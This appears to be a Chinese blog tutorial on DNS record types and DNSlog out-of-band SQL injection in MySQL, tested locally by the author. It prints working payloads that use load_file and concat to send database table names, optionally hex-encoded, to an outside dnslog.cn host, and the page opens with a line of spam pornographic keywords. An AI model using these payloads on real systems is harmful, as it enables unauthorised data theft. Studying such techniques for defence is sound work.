亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

DNSlog外帶原理及注入分析(最新推薦)

 更新時(shí)間:2024年01月08日 14:48:39   作者:S1nJa  
DNS的全稱是Domain?Name?System(網(wǎng)絡(luò)名稱系統(tǒng)),它作為將域名和IP地址相互映射,使人更方便地訪問互聯(lián)網(wǎng),最近一直聽到DNSlog外帶原理等詞但對其原理一直只是自己的理解(回顯DNS請求后的日志)并沒有真正的了解過,所以這里做一下記錄,感興趣的朋友一起看看吧

DNS基本概念

DNS中不同域名類型概念

DNS的全稱是Domain Name System(網(wǎng)絡(luò)名稱系統(tǒng)),它作為將域名和IP地址相互映射,使人更方便地訪問互聯(lián)網(wǎng)。當(dāng)用戶輸入某一網(wǎng)址如littlehann.com,網(wǎng)絡(luò)上的DNS Server會(huì)將該域名解析,并找到對應(yīng)的真實(shí)IP如101.37.97.51,使用戶可以訪問這臺(tái)服務(wù)器上相應(yīng)的服務(wù)。

DNSlog就是存儲(chǔ)在DNS Server上的域名訪問信息,它記錄著用戶對域名littlehann.com等的訪問信息,類似日志文件。

按照解析類型分類,DNS域名有如下幾種:

  • A記錄:A (Address) 記錄是用來指定主機(jī)名(或域名)對應(yīng)的IP地址記錄。就是說:通過A記錄,大家可以設(shè)置自己的不同域名轉(zhuǎn)到不同的IP上去。如:
    • www.dns.la轉(zhuǎn)到IP 116.255.202.1
    • web.dns.la 轉(zhuǎn)到IP 116.255.202.11
    • mail.dns.la 轉(zhuǎn)到IP 116.255.202.111
  • MX記錄(Mail Exchange):郵件交換記錄,用戶可以將該域名下的郵件服務(wù)器指向到自己的Mail Server上,然后即可自行操作控制所有的郵箱設(shè)置。
  • CNAME(Canonical Name)記錄:通常稱別名解析,可以將注冊的不同域名都轉(zhuǎn)到一個(gè)域名記錄上,由這個(gè)域名記錄統(tǒng)一解析管理,與A記錄不同的是,CNAME別名記錄設(shè)置的可以是一個(gè)域名的描述而不一定是IP地址。
  • URL(Uniform Resource Locator)轉(zhuǎn)發(fā):網(wǎng)址轉(zhuǎn)發(fā)功能,如果您沒有一臺(tái)獨(dú)立的服務(wù)器(也就是沒有一個(gè)獨(dú)立的IP地址)或者您還有一個(gè)域名B,您想訪問A域名時(shí)訪問到B域名的內(nèi)容,這時(shí)您就可以通過URL轉(zhuǎn)發(fā)來實(shí)現(xiàn)。URL轉(zhuǎn)發(fā)可以轉(zhuǎn)發(fā)到某一個(gè)目錄下,甚至某一個(gè)文件上。而CNAME是不可以,這就是URL轉(zhuǎn)發(fā)和CNAME的主要區(qū)別所在。
  • NS(Name Server):NS記錄是域名服務(wù)解析記錄,NS用來指定該域名由哪個(gè)DNS服務(wù)器來進(jìn)行解析,可以把一個(gè)域名的不同二級域名分別指向到不同的DNS系統(tǒng)來解析。
  • AAAA記錄:IPV6解析記錄,該記錄是將域名解析到一個(gè)指定的IPV6的IP上。

前言

最近一直聽到DNSlog外帶原理等詞但對其原理一直只是自己的理解(回顯DNS請求后的日志)并沒有真正的了解過,所以這里做一下記錄。

DNSlog原理

DNS

DNS(Domain Name System)就是域名系統(tǒng),負(fù)責(zé)把域名轉(zhuǎn)換成IP地址;例如向?yàn)g覽器訪問a.com,瀏覽器就會(huì)將其解析成真實(shí)的IP訪問對應(yīng)服務(wù)器上的服務(wù)。

DNSlog

DNSlog就是DNS的日志,DNS在域名解析的時(shí)候會(huì)留下域名和解析IP的記錄

DNSlog外帶原理

DNS在解析的時(shí)候會(huì)留下日志,我們將信息放在高級域名中,傳遞到自己這里,然后通過讀日志獲取信息。

所以這里跟最初的猜想基本一致,原理也就是通過DNS請求后,通過讀取日志來獲取我們的請求信息。

DNSlog注入

在搜索DNSlog原理時(shí)同時(shí)看到了DNSlog注入,所以本地測試一塊都了解一下

前置知識

Load_file

注入主要用到了Load_file函數(shù),功能是讀取文件并返回文件內(nèi)容為字符串。(訪問互聯(lián)網(wǎng)中的文件時(shí),需要在最前面加上兩個(gè)斜杠 //)

使用本函數(shù)有幾個(gè)前提:
1、首先要有注入點(diǎn)
2、需要有root權(quán)限
3、數(shù)據(jù)庫有讀寫權(quán)限即:secure_file_priv=“”
4、得有請求url權(quán)限
5、還必須得是windows服務(wù)器

D盤中寫了個(gè)1.txt

通過load_file函數(shù),讀取一下

select load_file('D:/1.txt')

concat

由于在通過load_file外帶時(shí)是無法執(zhí)行sql語句的,所以要通過concat函數(shù),將執(zhí)行的sql語句,與DNS請求的url進(jìn)行拼接

select concat('Sentiment','\\',(select database()));

本地測試

通過DNSlog外帶數(shù)據(jù)庫信息

select load_file(concat('//',(select group_concat(table_name separator '_') from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));


外帶表名

select load_file(concat('//',(select group_concat(table_name separator '_') from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));

剩下的就是sql注入常規(guī)操作了,就不一一列舉了

局限性

通過本地測試后,發(fā)現(xiàn)了一些問題,在url中傳遞字符有一定的局限性,很多字符是無法傳遞的,所以在外帶時(shí),可以通過十六進(jìn)制編碼繞過符號的局限性

select load_file(concat('//',(select hex(group_concat(table_name separator '_')) from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));

十六進(jìn)制轉(zhuǎn)字符

到此這篇關(guān)于DNSlog外帶原理及注入分析(最新推薦)的文章就介紹到這了,更多相關(guān)DNSLOG注入原理內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評論